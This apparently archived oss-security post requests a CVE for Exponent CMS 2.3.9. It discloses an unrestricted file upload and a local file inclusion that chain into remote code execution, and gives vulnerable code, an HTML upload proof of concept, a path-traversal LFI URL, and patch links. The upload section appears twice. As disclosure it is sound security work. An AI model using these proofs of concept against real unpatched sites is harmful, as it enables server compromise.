Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <tencent_4B081AB504A3C52B508F84E3@qq.com>
Date: Wed, 21 Sep 2016 10:08:21 +0800
From: "DM_" <contact@...ay.me>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request：Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability

Hi,


This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago. 


# Test environment
exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x


# Details


1. Unrestricted File Upload
there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + upload name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>


2. LFI


then LFI comes, at exponent-2.3.9/install/popup.php.


    <?php
    $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
    if (is_readable('popups/' . $page . '.php')) {
        include('popups/' . $page . '.php');
    }
    ?>


so we can upload a php file, then include it to make a RCE again.


POC: 
	http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test




3. Unrestricted File Upload and RCE


there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>






# Patches


https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.